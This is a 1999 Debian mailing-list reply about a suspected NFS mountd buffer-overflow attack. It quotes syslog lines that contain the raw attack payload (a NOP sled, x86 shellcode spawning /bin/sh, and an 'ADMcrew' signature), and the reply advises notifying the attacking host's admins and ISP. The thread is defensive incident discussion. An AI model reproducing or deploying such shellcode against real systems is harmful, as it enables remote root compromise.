Re: Possible NFS/mountd compromise?

To: pfaffben@pilot.msu.edu
Cc: debian-user@lists.debian.org, linux-user@egr.msu.edu
Subject: Re: Possible NFS/mountd compromise?
From: Joey Hess <joey@kitenet.net>
Date: Sun, 31 Jan 1999 20:15:53 -0800
Message-id: <[🔎] 19990131201552.O530@kitenet.net>
Mail-followup-to: pfaffben@pilot.msu.edu, debian-user@lists.debian.org, linux-user@egr.msu.edu
In-reply-to: <[🔎] m1078MV-000R6YC@pfaffben.user.msu.edu>; from Ben Pfaff on Sun, Jan 31, 1999 at 08:41:15PM -0500
References: <[🔎] m1078MV-000R6YC@pfaffben.user.msu.edu>

Ben Pfaff wrote:
> [CC:'s are appreciated; I am not subscribed to debian-user.  Thanks!]
> 
> I got the followed logged in my /var/log/syslog today.  It looks to me
> like a buffer overflow attack of some kind (character ? is `no
> operation' in x86 assembly language).  Does anyone know of a
> vulnerability in mountd to this sort of thing?

Yes, this particular exploit has to be the most-tried on the net right now.
I've had it tried against my system no fewer than 8 times in the past 2
months.

Current versions of debian are not vunerable. It's a buffer overrun exploit
leading to root shell, I think.
 
> Jan 31 18:26:41 pfaffben 29>Jan 31 18:26:41 mountd[355]: NFS mount of ??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????3Û3À°^[Í?3Ò3À?Ú°^FÍ0Þ¢1uô1À°^BÍ?,T@(Bubëb^V¬<ýt^FþÀt^Këõ°0þÈ?Fÿëì^°^B?^FþÈ?F^D°^F?F^H°f1ÛþÃ(IqÍ??(B^F°^Bf?F^L°*f?F^N?F^L?F^D1À?F^P°^P?F^H°fþÃÍ0?1^A?F^D°f³^DÍ0Ë1^DëLëR1À?F^D?F^H°fþÃÍ?,HC°(B?1ÉÍ0?1?þÁÍ0?1?þÁÍ0?1.bin@?^F¸.sh!@?F^D1À?F^G?v^H?F^L°^K(Is?(BN^H?V^LÍ?1À°^A1ÛÍ0È1EÿÿÿÿýÿPrivet ADMcrew(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(
> Jan 31 18:26:41 pfaffben ^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H attempted from 129.247.106.135 
> Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together
> Jan 31 18:26:41 pfaffben mountd[355]: NFS client <anon clnt> tried to access ??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????3Û3À°^[Í?3Ò3À?Ú°^FÍ0Þ¢1uô1À°^BÍ?,T@(Bubëb^V¬<ýt^FþÀt^Këõ°0þÈ?Fÿëì^°^B?^FþÈ?F^D°^F?F^H°f1ÛþÃ(IqÍ??(B^F°^Bf?F^L°*f?F^N?F^L?F^D1À?F^P°^P?F^H°fþÃÍ0?1^A?F^D°f³^DÍ0Ë1^DëLëR1À?F^D?F^H°fþÃÍ?,HC°(B?1ÉÍ0?1?þÁÍ0?1?þÁÍ0?1.bin@?^F¸.sh!@?F^D1À?F^G?v^H?F^L°^K(Is?(BN^H?V^LÍ?1À°^A1ÛÍ0È1EÿÿÿÿýÿPrivet ADMcrew(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(
> Jan 31 18:26:41 pfaffben -^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H 
> Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together
> Jan 31 18:26:41 pfaffben mountd[355]: Blocked attempt of 129.247.106.135 to mount ??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????3Û3À°^[Í?3Ò3À?Ú°^FÍ0Þ¢1uô1À°^BÍ?,T@(Bubëb^V¬<ýt^FþÀt^Këõ°0þÈ?Fÿëì^°^B?^FþÈ?F^D°^F?F^H°f1ÛþÃ(IqÍ??(B^F°^Bf?F^L°*f?F^N?F^L?F^D1À?F^P°^P?F^H°fþÃÍ0?1^A?F^D°f³^DÍ0Ë1^DëLëR1À?F^D?F^H°fþÃÍ?,HC°(B?1ÉÍ0?1?þÁÍ0?1?þÁÍ0?1.bin@?^F¸.sh!@?F^D1À?F^G?v^H?F^L°^K(Is?(BN^H?V^LÍ?

It's worth informing the admins of this box that their box has been cracked
and is being used as a platform to attack others. It's also worthwhile
informing thier ISP about this in case this is the cracker's actual home
machine.

-- 
see shy jo

Reply to:

References:
- Possible NFS/mountd compromise?
  - From: pfaffben@pilot.msu.edu (Ben Pfaff)

Prev by Date: Re: load fail
Next by Date: Re: using dpgk
Previous by thread: Possible NFS/mountd compromise?
Next by thread: gnome-apt
Index(es):
- Date
- Thread